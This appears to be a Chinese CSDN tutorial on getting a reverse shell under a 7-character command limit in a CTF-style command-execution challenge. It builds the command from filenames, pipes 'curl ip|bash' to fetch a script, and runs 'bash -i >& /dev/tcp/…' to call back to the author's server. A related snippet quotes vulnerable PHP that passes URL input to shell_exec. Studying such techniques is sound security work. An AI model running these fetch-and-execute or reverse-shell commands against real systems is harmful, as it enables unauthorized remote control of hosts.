限制命令长度如何反弹shell

最新推荐文章于 2024-07-20 18:38:43 发布
最新推荐文章于 2024-07-20 18:38:43 发布
阅读量448 收藏 1
点赞数 2
文章标签: linux web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/126178905
版权

问题:限制命令在7句以内如何反弹shell

先来看一个命令

直接输入一个*,发现输出了hello_qf.来看一下如何实现

在一个新的目录中,我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

于是输出了hello_qf.

那我们再来看一下使用命令ls -l

有两个方法:

方法一:

利用rev把字符串反过来。

rev作用:把字符串头变成尾,尾变成头翻转

test的内容

this is test

开始操作:

>dir原因

把 a 和 b 写到 c 里面

dir a b>c

执行了*>v,就是

dir l- sl > v

>v使用字母v的原因

*v>x就是

rev v

方法二:

待会使用反弹shell就是用这个方法,利用ls -t 的时间顺序来实现执行命令

abde994abc1391e112c0a65c808d2eae.png

反弹shell:

首先要确立一个反弹shell的语句,因为我们要设置为这个文件名,所以要尽量简单,而且尽量少有那种奇怪的符号。于是确立这个语句:

curl ip/shell.txt|bash

shell.txt的内容就是反弹shell

bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

但是这里面有一个'/'要避免,那我们就把这个shell.txt设置成默认页面,然后命令变成:

curl ip|bash

 

以上是命令

到服务器看一眼:

成功反弹shell

清风--
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shell脚本规范
Sunrise的专栏
11-05 3046
Shell脚本规范 Google 开源项目风格指南 Google 开源项目风格指南英文版 Google Shell脚本规范 背景 使用哪一种Shell Bash是唯一被允许执行的shell脚本语言 文件扩展名 可执行文件应该没有扩展名(强烈建议)或者使用.sh扩展名。库文件必须使用.sh作为扩展名,而且应该是不可执行的。 当执行一个程序时,并不需要知道它是用什么语言编写的。而且sh...
一条命令让你明白shell中read命令的常用参数
09-15
这对于限制用户输入的长度很有用,如在确认操作时仅接受`Y`或`N`。 3. `-s` 屏蔽回显:隐藏用户的输入,常见于处理密码输入,防止在终端上显示密码。 4. `-t` 等待时间:指定用户输入的超时时间,单位为秒。如果在...
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总
热门推荐
Love&Share
10-21 1万+
七字符rce 源码 <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFV
可控字符串长度受限情况下GetShell
shiyingai
09-23 457
可控字符串长度受限情况下GetShell思路分析利用案例EXP 环境:命令执行只允许输入七个字符,尝试写入webshell 思路分析   通过创建特殊的文件名(含有php代码),创建完后使用ls命令:ls>0 (把当前目录下所有的文件名写入到文件0中)。   shell命令太长,受长度限制,可以使用 “” 来分割,实现换行输入,最后写入到一个新的文件,然后执行:sh 0。文件0 执行后产生 1.php 就是写入的php马。 注:要考虑写入的先后顺序问题,使用ls可以加上-t参数来排序(最新创建的在
通过Shell命令向计算机程序传JSON思路及测试案例
黎明鱼儿
01-25 1025
本文讨论了Shell对特殊字符的限制,并提出了一种解决支持传输Json参数的通用思路。
shell的最大命令长度
weixin_33857679的博客
05-27 4667
linuxshell可以输入命令行,但是其长度是有限制的,在编写脚本程序的时候需要注意,否则可能由于命令过长而拒绝执行。获取这一系统参数的方法是:getconf ARG_MAX[root@VLT~]#getconfARG_MAX 2621440当执行 rm -f * ; mv * 之类的命令时,如果被操作的文件数量达到上万的数量级的时候,就可能会出现参数过多的提示。...
Linux xargs命令的使用
09-14
- `-n <num>`:限制每次命令执行时的参数数量。 - `-t`:打印出即将执行的命令。 - `-a <file>`:从指定文件中读取输入,而不是从stdin。 - `-i[replace-str]` 或 `-I [replace-str]`:替换字符串,将输入替换为...
shell自定义函数的6个特点总结
09-15
- 使用 `typeset` 或 `declare` 可以控制变量的类型,如使其成为只读或者限制长度。 - 函数名应遵循标识符命名规则,避免与内置命令或关键字冲突。 - 在函数内部,`set -e` 可以使脚本在遇到错误时立即退出,...
shell命令大全(linux下很有用的命令规范)
11-01
shell命令大全(linux下很有用的命令规范)
Shell创建用户并生成随机密码脚本分享
09-15
另外,Linux环境变量`$RANDOM`也可以用来生成随机整数,但它的范围是0到32767,若需要特定长度的随机数,可以通过取模运算 `%` 来限制范围。 下面是一个创建10位随机密码的Shell脚本实例,名为`passwd.sh`: ```...
如何获取shell的最大命令长度
yuanchao99的专栏
07-10 1万+
getconf ARG_MAX
Linux命令长度,命令行的长度限制是多少?
weixin_42524395的博客
04-29 4821
命令行的长度限制是多少?这取决于你问的是谁。CreateProcess函数的最长命令长度为32767字符。这个限制来自于UNICODE_STRING结构。CreateProcess是创建进程的核心函数,所以如果你直接调用该函数,该限制是你唯一需要注意的地方。但是如果你通过其他方式间接调用CreateProcess,那么可能会有其他限制。如果你使用的是CMD.EXE命令处理器,那么你同样受到CMD...
Linux:基础命令学习
最新发布
qq_55038440的博客
07-20 481
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX:懒汉单例模式线程池
W2155的博客
07-16 461
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
定制 Linux 内核的意义
地球空间
07-17 294
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 934
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 3799
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 332
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux入门:文件权限与Shell命令详解
文件名的创建需遵循一定的规则,如长度限制在256个字符以内,为保持与UNIX系统的兼容性,建议不超过14个字符。文件名可以包含字母、数字、点号、下划线和减号,但应避免使用特殊字符如星号(*)、问号(?)、尖括号()、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值